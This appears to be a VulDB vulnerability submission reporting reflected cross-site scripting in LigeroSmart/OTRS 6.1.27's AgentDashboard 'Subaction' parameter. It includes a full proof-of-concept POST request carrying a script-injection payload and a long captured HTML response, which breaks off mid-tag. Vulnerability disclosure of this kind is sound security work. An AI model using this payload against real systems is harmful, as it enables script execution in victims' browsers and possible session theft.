| Title | LigeroSmart LigeroSmart / OTRS 6.1.27 Cross-Site Scripting (XSS) – Reflected Subaction parameter |
|---|
| Description | A reflected Cross-Site Scripting (XSS) vulnerability was identified in the LigeroSmart application, within the AgentDashboard functionality in Subaction parameter. The issue is caused by improper input validation and lack of output encoding of the user-controlled Subaction parameter.
An authenticated attacker can inject arbitrary JavaScript code, which is reflected in the HTTP response and executed in the victim’s browser.
Docker was installed and tests were performed.
https://github.com/LigeroSmart/docker-ligerosmart
REQUEST
POST /otrs/index.pl HTTP/1.1
Host: localhost:9090
Content-Length: 263
sec-ch-ua-platform: "Windows"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:9090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9090/otrs/index.pl
Accept-Encoding: gzip, deflate, br
Cookie: OTRSAgentInterface=mGvYIUIyihthTyFtxMhNihGuC3BGLRnw
Connection: keep-alive
Action=AgentDashboard;Subaction=Element</script><script>alert(7776)</script>;Name=0130-TicketOpen;AdditionalFilter=;Filter=MyServices;CustomerID=;CustomerUserID=;SortBy=Age;OrderBy=Down;SortingColumn=Age;TabAction=1;ChallengeToken=UFfwuDve1AuIS2ehbEmyWw4pZ2qVcCeE
RESPONSE
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Disposition: filename="AgentDashboard.html"
Content-Type: text/html; charset=utf-8;
Date: Sat, 31 Jan 2026 14:08:15 GMT
Expires: Tue, 1 Jan 1980 12:00:00 GMT
Pragma: no-cache
Server: nginx
X-Frame-Options: SAMEORIGIN
X-Ua-Compatible: IE=edge,chrome=1
Content-Length: 98692
<!DOCTYPE html>
<html>
<!-- -->
<!-- OTRS: Copyright (C) 2001-2020 OTRS AG, https://otrs.com/. -->
<!-- Web: https://otrs.com/ - Lists: https://lists.otrs.org/ -->
<!-- GNU General Public License: https://www.gnu.org/licenses/gpl-3.0.txt -->
<!-- -->
<head>
<meta http-equiv="Content-type" content="text/html;charset=utf-8" />
<meta id="viewport" name="viewport" content="">
<meta name="robots" content="noindex,nofollow" />
<script>
(function(doc, win) {
var viewport = doc.getElementById('viewport'),
isIFrame = (win.top.location.href !== win.location.href),
isPopup = (win.name.search(/^OTRSPopup_/) != -1);
try {
if (((!isIFrame && !isPopup) || (isIFrame && isPopup)) && (!localStorage.getItem("DesktopMode") || parseInt(localStorage.getItem("DesktopMode"), 10) <= 0)) {
viewport.setAttribute("content", "width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no");
}
}
catch (Exception) {}
}(document, window));
</script>
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (Ticket#)" href="/otrs/index.pl?Action=AgentTicketSearch;Subaction=OpenSearchDescriptionTicketNumber" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (Texto Completo)" href="/otrs/index.pl?Action=AgentTicketSearch;Subaction=OpenSearchDescriptionFulltext" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (FAQ#)" href="/otrs/index.pl?Action=AgentFAQSearch;Subaction=OpenSearchDescriptionFAQNumber" />
<link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (FAQ-TextoCompleto)" href="/otrs/index.pl?Action=AgentFAQSearch;Subaction=OpenSearchDescriptionFulltext" />
<link rel="shortcut icon" href="/otrs-web/skins/Agent/ligero/img/icons/product.ico" type="image/ico" />
<link rel="apple-touch-icon" href="/otrs-web/skins/Agent/ligero/img/icons/apple-touch-icon.png" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css-cache/CommonCSS_58d99bf049eab644adf1f2f6d94d8555.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/ligero/css-cache/CommonCSS_9ccfdcfb580d3c1055590bb9f234fef7.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css-cache/ModuleCSS_b0fcdb56932ab41797730e5b31c77fa7.css" />
<link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css/thirdparty/ui-theme/jquery-ui.css" />
<style type="text/css">
#Header #Logo {
background-image: url(/otrs-web/skins/Agent/default/img/logo_bg.png);
top: 7px;
right: 24px;
width: 300px;
height: 55px;
}
</style>
<link rel="stylesheet" type="text/css" href="/otrs-web/common/css/font-awesome.min.css" />
<script>
(function(doc, win) {
var isIFrame = (win.top.location.href !== win.location.href),
isPopup = (win.name.search(/^OTRSPopup_/) != -1);
try {
if (((!isIFrame && !isPopup) || (isIFrame && isPopup)) && (!localStorage.getItem("DesktopMode") || parseInt(localStorage.getItem("DesktopMode"), 10) <= 0)) {
var ResponsiveCSS;
ResponsiveCSS = doc.createElement("link");
ResponsiveCSS.setAttribute("rel", "stylesheet");
ResponsiveCSS.setAttribute("type", "text/css");
ResponsiveCSS.setAttribute("href", "/otrs-web/skins/Agent/default/css-cache/ResponsiveCSS_342832cd0dfa4f871e6b8d41435252e0.css");
doc.getElementsByTagName("head")[0].appendChild(ResponsiveCSS);
}
}
catch (Exception) {}
}(document, window));
</script>
<title>Painel - LigeroSmart</title>
<script type="text/javascript">//<![CDATA[
"use strict";
var Core = Core || {};
Core.App = Core.App || {};
/**
* @function
* Ignores an event. Implemented without jQuery because no external JavaScript is available yet.
* @return nothing
*/
function IgnoreEvent (Event) {
if (Event.preventDefault) {
Event.preventDefault();
}
Event.returnValue = false;
return false;
}
/**
* @function
* This function blocks all click events on the page until it is
* unblocked after all JavaScript was loaded. Implemented without
* jQuery because no external JavaScript is available yet.
* @return nothing
*/
Core.App.BlockEvents = function() {
if (document.addEventListener) {
document.addEventListener('click', IgnoreEvent, false);
}
else {
document.attachEvent('onclick', IgnoreEvent);
}
};
/**
* @function
* This function unblocks all click events on the page
* after all JavaScript was loaded. Implemented without
* jQuery because no external JavaScript is available yet.
* @return nothing
*/
Core.App.UnblockEvents = function() {
if (document.removeEventListener) {
document.removeEventListener('click', IgnoreEvent, false);
}
else {
document.detachEvent('onclick', IgnoreEvent);
}
// allow tests to wait for complete page load
Core.App.PageLoadComplete = true;
};
// Now block all click events on the page to make sure that
// an agent does not click before all JavaScript was loaded,
// as event listeners are not yet available, for example.
Core.App.BlockEvents();
//]]></script>
</head>
<body class="">
<a name="Top"></a>
<div id="AppWrapper">
<div id="Header" class="ARIARoleBanner">
<div id="Logo"></div>
<ul id="ToolBar">
<li class="UserAvatar">
<a href="#">
<img src="//www.gravatar.com/avatar/b1a4b2518dbbdd47dd4a713d5cd1df94?s=100&d=mp" />
</a>
<div>
<span>Admin LigeroSmart</span>
<a href="/otrs/index.pl?Action=AgentPreferences" title="Editar preferências pessoais">
<i class="fa fa-cog"></i><strong>Preferências Pessoais</strong>
</a>
<a class="LogoutButton" id="LogoutButton" href="/otrs/index.pl?Action=Logout;ChallengeToken=UFfwuDve1AuIS2ehbEmyWw4pZ2qVcCeE;" title="Sair (Você está logado como Admin LigeroSmart)">
<i class="fa fa-power-off"></i><strong>Sair</strong>
</a>
</div>
</li>
<li class="QueueView"><a href="/otrs/index.pl?Action=AgentTicketQueue" target="" accesskey="q" title="Visão de Filas: (q)">Visão de Filas <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i><i class="fa fa-folder"></i> <span class="Counter"></span> </a></li>
<li class="QueueView"><a href="/otrs/index.pl?Action=AgentTicketQueueKanban" target="" accesskey="q" title="Kanban view: (q)">Kanban view <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i><i class="fa fa-random"></i> <span class="Counter"></span> </a></li>
<li class="ComplementoView"><a href="/otrs/index.pl?Action=AgentTicketComplementoView" target="" accesskey="q" title="Complemento View: (q)">Complemento View <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i><i class="fa fa-filter"></i> <span class="Counter"></span> </a></li>
<li class="StatusVie |
|---|
| Source | ⚠️ https://github.com/LigeroSmart/ligerosmart/issues/284 |
|---|
| User | Samara Gama - igobysamy (UID 81801) |
|---|
| Submission | 01/31/2026 15:16 (3 months ago) |
|---|
| Moderation | 02/15/2026 17:00 (15 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 346156 [LigeroSmart up to 6.1.26 /otrs/index.pl AgentDashboard Subaction cross site scripting] |
|---|
| Points | 20 |
|---|